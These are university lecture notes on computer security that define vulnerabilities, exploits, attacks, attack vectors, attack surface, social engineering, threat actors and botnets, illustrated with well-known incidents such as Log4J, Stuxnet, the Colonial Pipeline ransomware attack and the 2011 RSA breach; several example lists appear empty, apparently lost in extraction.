pk.org: Computer Security/Lecture Notes

Part 2 - Threats, Vulnerabilities, and Attacks

What attacks try to do

Paul Krzyzanowski – July 26, 2025

Part 2: Threats, Vulnerabilities, and Attacks

When systems fail or are compromised, it is usually because an attacker has discovered a vulnerability and found a way to exploit it. To understand computer security, we need to distinguish between vulnerabilities, exploits, attacks, and threats. These terms are often used interchangeably in casual conversation but they mean different things in security.

Vulnerabilities

A vulnerability is a flaw or weakness that can be exploited. Vulnerabilities may be caused by software bugs, design flaws, misconfigurations, or even human errors. They are the entry points that allow an attacker to compromise confidentiality, integrity, or availability.

Examples include:

Some vulnerabilities lie deeper in hardware rather than software.

These cases revealed that vulnerabilities are not limited to software mistakes but can be rooted in hardware design itself.

One of the most famous software vulnerabilities in recent history was Log4J, discovered in late 2021. Log4J is a popular Java library for logging messages. A subtle flaw allowed attackers to insert special text into log messages, which caused the software to execute malicious code. Since Log4J was embedded in tens of thousands of software packages, the vulnerability had a global impact and is still being exploited today.

Exploits

An exploit is the tool, code, or technique that takes advantage of a vulnerability. The vulnerability is the unlocked door; the exploit is the crowbar used to break in.

For example:

The key point is that vulnerabilities and exploits are different. A vulnerability may exist for years before someone develops an exploit to take advantage of it.

Attacks

An attack is the execution of an exploit with the intent to cause harm. Attacks put exploits into action. They may attempt to steal data, alter information, disable services, or gain unauthorized control.

Common types of attacks include:

The Colonial Pipeline attack in 2021 is a clear example. Attackers used a compromised password to log into the company’s network, then deployed ransomware that forced the company to shut down operations. This was not just a vulnerability but a full attack with real-world consequences: fuel shortages across the U.S. East Coast.

Attack Vectors

An attack vector is the path or method an attacker uses to deliver an exploit. Vectors define how an attack begins.

Examples include:

In 2010, the Stuxnet worm spread to Iran’s nuclear facilities through USB drives. Since the facilities were not connected to the Internet, attackers had to rely on physical access as the attack vector.

Attack Surface

An attack surface is the total number of possible entry points in a system. The more exposed services, interfaces, and users, the larger the attack surface and the more opportunities an attacker has.

Examples of attack surface include:

Reducing the attack surface makes systems harder to compromise. Disabling unused services, limiting access, and educating users all help shrink the number of possible entry points.

Social Engineering

Not all vulnerabilities are technical. In many attacks, the easiest path in is not through a software flaw but through a person. Social engineering refers to techniques that manipulate, deceive, or influence people into giving up information or access. Instead of breaking cryptography or bypassing a firewall, an attacker may simply trick a user into opening the door.

Common methods include:

A classic example was the 2011 RSA breach. Attackers sent a phishing email with the subject line “2011 Recruitment Plan.” The attached Excel file contained a Flash object that exploited a zero-day vulnerability. Once opened, it gave attackers access to RSA’s internal systems and sensitive data related to its SecurID authentication tokens. This attack succeeded not through a technical vulnerability alone, but because an employee trusted and opened the file.

Social engineering underscores that humans are part of the attack surface. Training, awareness, and organizational culture are as important as software patches in reducing risk. We will look at social engineering methods in much more detail later in the course.

Vulnerabilities are tracked and cataloged using systems like CVE and CVSS, which we’ll explore in detail later.

Threats and Threat Actors

A threat is the possibility of an attack. A threat actor (or agent) is the adversary who may carry it out. Not every threat actor attacks, but the potential exists.

Ross Anderson, in his book Security Engineering, classifies threats into four categories:

Other terms often used in this context include snooping (eavesdropping), modification (alteration), masquerading (spoofing), repudiation of origin, denial of receipt, and delay.

Classifying threats always rests on assumptions about an attacker’s motivation and skill. A system may be resistant to casual scanning but vulnerable to determined adversaries with custom tools.

Threat Matrix

Another way to classify threats is by capability and focus. A threat matrix distinguishes between:

Most real-world attacks fall somewhere on this spectrum. Opportunistic automated scanning for weak passwords is very different from a targeted advanced persistent threat, but both fit within the threat matrix.

The Internet as a Risk Amplifier

The design of the Internet makes attacks easier. It was created in the 1970s to interconnect networks, not to provide secure communication. Its architecture is open and decentralized, which is powerful but risky.

Features that make the Internet attractive for attackers include:

These structural properties explain why defending systems is so difficult. The Internet gives attackers opportunities that would not exist in the physical world.

Botnets

A botnet is a network of compromised machines (often called bots or zombies) controlled remotely through a command and control server. Botnets are used for spam, phishing, cryptocurrency mining, and especially for launching DDoS attacks. The Mirai botnet in 2016 demonstrated the power of millions of insecure IoT devices being turned into a coordinated weapon.

Case Studies

The following incidents illustrate how vulnerabilities, exploits, and attacks play out in practice. Some are classic examples that highlight fundamental concepts, while others are more recent cases showing that these problems remain pressing today.